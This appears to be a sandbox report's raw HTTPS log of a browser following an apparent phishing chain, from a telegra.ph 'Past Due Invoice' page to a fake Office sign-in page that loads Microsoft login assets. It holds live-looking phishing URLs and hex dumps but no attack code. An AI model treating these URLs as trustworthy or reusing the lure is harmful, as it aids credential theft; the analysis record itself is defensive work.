                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC915INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                                                                                                                                                                                                            Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            26192.168.2.64989613.107.219.60443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC872OUTGET /ests/2.1/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                                                                                                                                                                            Host: aadcdn.msauth.net
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                            Referer: https://karmarejoice.com/lopi/office-RD117/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC913INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800
                                                                                                                                                                                                                            Content-Length: 276
                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                                            Content-MD5: TjUQkZ0p0Y7rbj6LJofS9Q==
                                                                                                                                                                                                                            Last-Modified: Fri, 02 Nov 2018 20:25:09 GMT
                                                                                                                                                                                                                            ETag: 0x8D64101494758DF
                                                                                                                                                                                                                            Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            x-ms-request-id: 91d75960-a01e-0035-2365-659168000000
                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            X-Azure-Ref-OriginShield: 0/BN9YgAAAADgA0cKskBYRoguj887Dm1hQU1TMDRFREdFMTkyMQAzOWExMmY3ZS04OTlmLTQ2Y2YtYTZkMC0yNGJiYmEyN2Q5NTY=
                                                                                                                                                                                                                            X-Azure-Ref: 0nqd+YgAAAAAxpU7mIL+iQK+3bk5VXTdeRlJBMjMxMDUwNDE3MDE5ADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng==
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:53 GMT
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC914INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                                                                                                                                                                            Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            27192.168.2.64990050.87.150.0443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC919OUTGET /css/app.css HTTP/1.1
                                                                                                                                                                                                                            Host: dancevida.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                            Referer: https://karmarejoice.com/lopi/office-RD117/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:55 UTC919INHTTP/1.1 302 Found
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:55 GMT
                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                            Location: https://dancevida.com/cgi-sys/suspendedpage.cgi
                                                                                                                                                                                                                            Content-Length: 231
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                            2022-05-13 18:46:55 UTC919INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 6e 63 65 76 69 64 61 2e 63 6f 6d 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://dancevida.com/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            28192.168.2.64990150.87.150.0443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:55 UTC919OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                                                                                                                                                                            Host: dancevida.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                            Referer: https://karmarejoice.com/lopi/office-RD117/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:55 UTC920INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:55 GMT
                                                                                                                                                                                                                            Server: nginx/1.19.10
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            X-Server-Cache: false
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            2022-05-13 18:46:55 UTC920INData Raw: 31 66 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6e 74 61 63 74 20 53 75 70 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 3c 62 6f 64 79 20 6d 61 72 67 69 6e 77 69
                                                                                                                                                                                                                            Data Ascii: 1f0<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Contact Support</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body marginwi


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            29192.168.2.649902103.53.43.226443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:56 UTC920OUTGET /lopi/office-RD117/images/bg.jpg HTTP/1.1
                                                                                                                                                                                                                            Host: karmarejoice.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                            Referer: https://karmarejoice.com/lopi/office-RD117/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:56 UTC921INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:56 GMT
                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                                                            Last-Modified: Mon, 31 Aug 2020 21:49:20 GMT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Content-Length: 42147
                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                            2022-05-13 18:46:56 UTC921INData Raw: ff d8 ff e1 05 93 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 94 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 38 3a 33 31 20 32 31 3a 34 39 3a 31 39 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 05 56 a0 03 00 04 00 00 00 01 00 00 03 00 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
                                                                                                                                                                                                                            Data Ascii: ExifMM*bj(1"r2i''Adobe Photoshop CC 2015 (Windows)2020:08:31 21:49:19V"
                                                                                                                                                                                                                            2022-05-13 18:46:56 UTC929INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            2022-05-13 18:46:56 UTC937INData Raw: 00 00 84 d4 b0 6a 52 2c 92 11 92 19 85 46 09 04 0c 11 d4 86 01 b0 06 40 00 00 00 00 00 00 00 00 01 58 d1 2c 9b 4b 83 34 85 00 30 6a 6c 0d 4d 49 40 00 1a 98 85 99 58 c1 b8 8c d6 c6 86 c6 4c 80 00 00 02 b9 92 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 13 52 c1 54 f9 88 ca bf 24 db 2f 4f 2f 2d 67 b3 73 99 5d dc 5e 65 ce b9 b3 eb 31 ae 2d e6 c5 ba 84 d0 f6 c7 a4 00 00 00 00 00 00 00 00 00 11 f3 9c eb cb 72 63 a5 9b 04 bd 4b 9e 94 bc 03 a7 5d 2a e5 44 95 d3 d3 cb e5 62 a7 ca a1 64 ec 59 c8 cd dc bf a5 59 2b 5b 88 87 32 c6 ef 4f 32 8d b4 ae a4 b3 b0 73 12 48 ae 4d 97 77 4f 5e 64 00 00 00 ae 64 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 d4 b0 68 72 8a 39 b4 f7 2d e7 26 ab d4 c5
                                                                                                                                                                                                                            Data Ascii: jR,F@X,K40jlMI@XLpRT$/O/-gs]^e1-rcK]*DbdYY+[2O2sHMwO^ddhr9-&
                                                                                                                                                                                                                            2022-05-13 18:46:56 UTC945INData Raw: b7 b6 c8 dd 46 44 99 58 63 73 b3 96 ed 51 64 e2 99 ae cb c2 c3 f9 9b 72 a3 bd 8a 46 bb 25 13 0f e6 6d d3 32 d0 15 05 c0 9b e7 12 02 5c d8 85 34 82 d2 0b 48 2d 20 b4 82 d2 0b 48 2d 20 b4 82 d2 0b 48 2d 20 b4 82 d2 0b 48 2d 20 b4 82 7b 3a 14 64 90 ae 3b 2d fb 3d 13 37 6c 1c 32 0c 73 ed ef 30 37 93 4f 05 8d fd ab 69 91 71 73 32 21 d6 2d b9 d0 bf b5 be 33 cb 67 7a f1 65 6f 7d 1b 26 b6 ba 73 f6 97 6a c6 2b c0 ae ed ee 1a 1b 6d 72 e4 cb 5b ee ac 3b 5f 1c 3f 37 3c dd f0 12 00 7d fc 4d 7b 2e 22 70 d5 8d 6a c6 8d d4 0d 46 e6 3a 36 f2 17 1d 68 d0 7b 5d f0 c8 39 46 39 2b 8e cb 7e cf 44 cd db 07 07 74 d1 d2 59 85 2c 96 44 c6 eb 12 5f b2 09 b7 16 ac 4f 92 c8 87 5c 59 35 c2 4b 60 c6 5c 59 bc bd d6 00 4b 91 b3 b7 50 de d9 dc a6 ec 01 7c b6 2c 4d c9 5b 34 c7 79 1d 37 96
                                                                                                                                                                                                                            Data Ascii: FDXcsQdrF%m2\4H- H- H- H- {:d;-=7l2s07Oiqs2!-3gzeo}&sj+mr[;_?7<}M{."pjF:6h{]9F9+~DtY,D_O\Y5K`\YKP|,M[4y7
                                                                                                                                                                                                                            2022-05-13 18:46:56 UTC952INData Raw: e0 0e d5 e8 b7 25 e5 00 51 36 9f d7 06 f4 36 0f 72 8e c2 8e e4 6c b8 38 38 23 7f 57 a3 d3 24 97 2f 68 5f f4 fd 3f b4 2f fa 7e 9f da 17 fd 3f 4f ed b5 7f 07 4f ed b5 7f d3 f4 fe db 57 f0 74 fe db 56 3f e3 f4 fe d0 bf e9 fa 74 0b fe 9f a6 df f9 6d 42 fe 97 46 cb 48 3a 2d 1a 10 b6 d8 00 7b 5c a8 fe 88 f7 28 6f 5b 1b 83 fb 94 5b 51 5d ea 33 58 8c 77 85 19 95 19 95 19 95 1c 7e 0a 38 fc 14 66 54 66 54 66 54 66 56 03 8a c4 71 50 3b 6e 50 3b 6e 51 c5 47 1f 82 8e 3f 05 03 3f 82 81 db 72 8e 3f 05 1c 7e 0b d2 29 f2 50 3b 6e 51 c7 e0 a3 8f c1 40 cf e0 a0 67 f0 5e 91 db 72 f4 8a 7c 97 a4 53 e4 bd 22 9f 25 e9 14 f9 2f 48 a7 c9 7a 45 3e 4b d2 29 f2 5e 91 4f 92 f4 8a 7c 97 a4 53 e4 bd 22 9f 25 e9 14 f9 2f 48 a7 c9 7a 45 3e 4b d2 29 f2 5e 91 4f 92 f4 8a 7c 97 a4 53 e4 bd
                                                                                                                                                                                                                            Data Ascii: %Q66rl88#W$/h_?/~?OOWtV?tmBFH:-{\(o[[Q]3Xw~8fTfTfTfVqP;nP;nQG??r?~)P;nQ@g^r|S"%/HzE>K)^O|S"%/HzE>K)^O|S
                                                                                                                                                                                                                            2022-05-13 18:46:56 UTC960INData Raw: 58 47 7f 87 b2 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0b 02 e8 6f e0 86 c1 ee 57 6d 61 1d fe 0a 59 4e 4a 72 53 92 9c 94 e4 a7 25 39 29 c9 4e 4a 72 53 92 9c 94 e4 a7 25 39 29 c9 4e 4a 72
                                                                                                                                                                                                                            Data Ascii: XGEBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)oWmaYNJrS%9)NJrS%9)NJr


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            3192.168.2.649850149.154.164.13443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:43 UTC5OUTGET /Past-Due-Invoice-05-13 HTTP/1.1
                                                                                                                                                                                                                            Host: telegra.ph
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:43 UTC6INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:43 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                            Content-Length: 4996
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Cache-control: no-store
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            2022-05-13 18:46:43 UTC6INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 73 74 20 44 75 65 20 49 6e 76 6f 69 63 65 73 20 e2 80 93 20 54 65 6c 65 67 72 61 70 68 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61
                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Past Due Invoices Telegraph</title> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <meta na


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            30192.168.2.64990513.107.219.60443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC962OUTGET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                                                                                                                                                                            Host: aadcdn.msauth.net
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                            Referer: https://karmarejoice.com/lopi/office-RD117/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC963INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800
                                                                                                                                                                                                                            Content-Length: 17174
                                                                                                                                                                                                                            Content-Type: image/x-icon
                                                                                                                                                                                                                            Content-MD5: EuPayFgGHQiAI7K9SOL6lg==
                                                                                                                                                                                                                            Last-Modified: Fri, 02 Nov 2018 20:25:25 GMT
                                                                                                                                                                                                                            ETag: 0x8D6410152A9D7E1
                                                                                                                                                                                                                            Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            x-ms-request-id: 6197f52b-301e-005c-0df5-65a059000000
                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            X-Azure-Ref-OriginShield: 0OAR9YgAAAAB4LO0y7q9cRpdrwhaat94/QU1TMDRFREdFMTkwOAAzOWExMmY3ZS04OTlmLTQ2Y2YtYTZkMC0yNGJiYmEyN2Q5NTY=
                                                                                                                                                                                                                            X-Azure-Ref: 0oad+YgAAAACHGy+ehNDVQqYOgPtpDJtnRlJBMjMxMDUwNDE5MDUzADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng==
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:56 GMT
                                                                                                                                                                                                                            Connection: close
